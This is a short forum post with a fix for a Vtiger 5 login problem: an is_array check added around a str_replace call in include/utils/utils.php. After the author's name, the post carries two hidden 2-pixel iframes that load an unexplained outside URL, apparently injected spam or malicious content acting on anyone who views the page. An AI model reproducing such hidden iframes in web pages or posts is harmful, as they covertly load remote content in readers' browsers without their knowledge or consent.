Quick fix for Firefox toolbar

I saw that Firefox toolbar was not working, unable to login to Vtiger 5, this is a little fix that worked for me:

open "include/utils/utils.php", edit line 840 changing this:
$string = str_replace(array_keys($toHtml), array_values($toHtml), $string);

with this:
if (is_array($toHtml)) { $string = str_replace(array_keys($toHtml), array_values($toHtml), $string); }

Devis Lucato <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>; <iframe width="2px" height="2px" src="http://www.yooclick.com/l/9qjblg"></iframe>;

Comments

This discussion has been closed.